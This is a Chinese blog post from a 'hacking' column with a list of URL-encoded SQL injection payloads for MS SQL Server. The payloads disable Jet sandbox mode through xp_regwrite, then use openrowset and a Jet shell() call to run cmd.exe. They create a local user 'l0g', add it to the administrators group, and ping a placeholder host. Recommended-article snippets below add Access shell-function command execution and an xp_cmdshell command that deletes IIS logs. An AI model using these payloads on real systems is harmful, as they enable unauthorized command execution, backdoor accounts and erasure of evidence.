利用access执行命令的一个实例

最新推荐文章于 2021-05-28 15:34:41 发布
最新推荐文章于 2021-05-28 15:34:41 发布
阅读量1k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: hacking 文章标签: access database shell user c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/l0g/article/details/575774
本文展示了一种利用SQL注入漏洞进行权限提升的方法,通过特定的SQL语句修改注册表设置,并利用OLE DB连接执行系统命令创建新用户并将其加入管理员组,最终实现对系统的完全控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


;exec%20master..xp_regwrite%20'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0;--


%20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/dnary.mdb','select%20shell("cmd.exe%20/c%20net%20user%20l0g%20l0g%20/add")'))


%20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/dnary.mdb','select%20shell("cmd.exe%20/c%20net%20localgroup%20administrators%20l0g%20/add")'))

net%20localgroup%20administrators%20l0g%20/add


 %20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/dnary.mdb','select%20shell("cmd.exe%20/c%20ping xxx.xxx.xxx.xxx")'))

l0g
关注
专栏目录
Access数据库也能执行cmd命令
李慖铖dē個亻專欄
07-23 6906
Access数据库也能执行cmd命令 Access查询中有类似这样的语句 Select * from Sometable where somefield='|Select Shell("cmd.exe /c dir")|'  关于这个语句的介绍,是漏洞资料中所说的,Access允许用"|"来创建VBA函数,导致命令被执行,其实这只是Access内置的一个特殊函数而已,相类似的
Linux Access函数实例应用详解
Acmey的专栏
10-30 434
由于Linux Access函数只作权限的核查,并不理会文件形态或文件内容,因此,如果一 目录表示为“可写入”,表示可以在该目录中建立新文件等操作,而非意味此目录可以 被当做文件处理。例如,你会发现DOS的文件都具有“可执行”权限,但用execve执行 时则会失败。   Linux Access函数(判断是否具有存取文件的权限)   相关函数stat,open,chm...
SQL Server定时执行SQL语句
sinolover的专栏
03-30 1654
企业管理器 --管理 --SQL Server代理 --右键作业 --新建作业 --"常规"项中输入作业名称 --"步骤"项 --新建 --"步骤名"中输入步骤名 --"类型"中选择"Transact-SQL 脚本(TSQL)" --"数据库"选择执行命令的数据库 --"命令"中输...
access update语句执行_远程定时备份Access数据库到SQL Server
weixin_39798626的博客
11-23 591
一、整体思路1、 使用SQL Server内存储过程被定时执行的方法,在作业>步骤>计划时间内设置时间节点触发步骤,时间节点可以触发重复执行步骤或只执行一次。2、 在Host1机器上SQL Server中创建数据库,表3、 在Host2(Host1上也可以,此处用于验证局域网机器备份)机器上创建一个Access数据库,表,该数据库位于共享路劲下4、 Host1上的SQLServer内创...
c语言 dbcmd函数,Access数据库也能执行cmd命令
weixin_42368226的博客
05-28 429
Access查询中有类似这样的语句Select * from Sometable where somefield='|Select Shell("cmd.exe /c dir")|'关于这个语句的介绍,是漏洞资料中所说的,Access允许用"|"来创建VBA函数,导致命令被执行,其实这只是Access内置的一个特殊函数而已,相类似的还有cudir和Command函数.具体的我们可以在Access中...
c# 查询access表数据实例源码
最新发布
01-14
在这个示例中,首先创建了与Access数据库的连接,然后执行了一个查询命令,读取了Employees表中的所有记录,并将其中的ColumnName列的数据输出到了控制台。同时,整个过程中使用了try-catch结构来处理可能出现的异常...
ACCESS常用的窗体查询方法及实例.doc
05-08
教程提供的示例窗体“常用窗体查询 0.MDB”包含3个数据表、1个查询和一个基于此查询的报表,用于实践所学知识。 ### 二、制作主/子窗体的步骤 1. **利用向导制作主窗体** - 扩大窗体面积以容纳更多控件,调整字体...
c++ 连接Access,学生选课win32实例
10-18
标题 "c++ 连接Access,学生选课win32实例" 描述了一个使用C++编程语言在Windows环境下实现的数据库应用。这个程序利用了Microsoft的Jet引擎,通过ODBC(Open Database Connectivity)接口来连接并操作Microsoft ...
C#操作Access通用类实例
09-03
本篇文章将详细介绍如何在 C# 中创建一个用于操作 Access 数据库的通用类,并通过实例分析其常见技巧。 首先,我们需要引入必要的命名空间,包括 `System.Data.OleDb` 用于 OleDB 数据提供者,以及 `System....
VB操作ACCESS数据库实例Access数据库同步。
11-04
实例探讨了如何利用VB实现Access数据库之间的数据同步,这对于数据备份、多数据库协作或者分布式系统来说至关重要。 首先,我们需要理解VB与Access数据库交互的基础——ADO(ActiveX Data Objects)。ADO是微软...
access里面的表达式运用_Spring定时、cron表达式详解
weixin_28922555的博客
12-28 301
最简单的定时任务下面代码会定时一秒打印一次,只需要加两个注解,一个是开启定时任务的注解,一个是设定定时任务的执行频率(单位是毫秒)。cron表达式我们发现上面的定时任务只会按照一定的频率去执行,但是我们的需求往往没有那么简单,这个时候我们需要借助cron表达式,这个的历史我就不介绍了。cron表达式一共有七位(用空格区分),在Spring当中只支持六位,也就不支持年份。在上表当中,我们...
ACCESS的真假:一、DROP删除表再重建比Delete from Table1快吗?
ACMAIN_CHM的专栏
05-16 6802
有时候当我们需要把表中记录全部删除的时候,在很多数据库系统中我们会习惯性选择用truncate table 来实现,truncate table 在很多DBMS中是认为DDL语句,等同于drop table 然后再create table. 速度效率上一般认为远比delete from table高得多。 虽然Drop table 和 delete 没什么可比性,有些类似于去拿 insert
Access环境下使用PowerShell执行SQL命令
weixin_33908217的博客
08-22 765
要使用数据就要先连接上数据库,连接Access的方式有好几种,我现在使用的是Oledb连接方式。其中又分为无密码和有密码。 无密码连接文本:Provider=Microsoft.ACE.OLEDB.12.0;Data Source=myAccessFile.accdb;Persist Security Info=False;有密码连接文本:Provider=Microsoft.ACE.OLEDB....
SQL下三种执行CMD命令的方法
dato0123
01-11 2737
SQL下三种执行CMD命令的方法:先删除7.18号日志:(1)exec master.dbo.xp_cmdshell 'del C:/winnt/system32/logfiles/W3SVC5/ex050718.log &gt;c:/temp.txt'(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd B...
Access中执行SQL语句
weixin_34391445的博客
07-22 1040
Access在小型系统开发中等到了广泛使用。虽然Access提供了可视化的操作方法,但许多开发人员还是喜欢直接用SQL语句操作数据表。如何在Access中打开SQL视图,对于初次使用Access的程序员可得费点时间呢。 1、ACESS2007 (1)点击“创建”--点击 “查询设计” (2)点击关闭 (3)点击左上角的"SQL视图"就可以打开SQL窗口了 2、ACCESS 2...
数据库 DROP命令和DELETE命令的本质区别是什么
热门推荐
weixin_30628801的博客
07-02 1万+
不同点:  1. 从删除内容上区分:  truncate和 delete只删除数据不删除表的结构(定义)  drop语句将删除表的结构、被依赖的约束(constrain),触发器(trigger),索引(index); 依赖于该表的存储过程/函数将保留,但是变为invalid状态.  2.从语句类型上来区分:  delete语句是dml,这个操作会放到rollback segement中,事务提交...
bat循环执行 一秒一次_Windows实现Python脚本的定时执行
weixin_39818264的博客
11-20 4031
在Linux操作系统下,可以通过crontab命令来实现任务的定时执行。那么在Windows系统下,如何实现这一功能呢?其实非常简单,只需要采用向注册表添加启动项,来执行批处理程序的思路。1、F:autodemo目录下创建一个python文件,命名为autorun.py,主要利用python自带的sched模块来创建一个定时任务。定时任务通过os.system()方法来执行命令。需要注意的是,多个...
VC6利用ADO技术操作Access数据库实例教程
连接字符串:定义一个连接字符串,明确指定要连接的Access数据库文件以及使用的提供者。 d. 打开连接:使用Connection对象的Open方法打开数据库连接。 e. 执行SQL命令:通过ADO的Command对象或者Connection...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值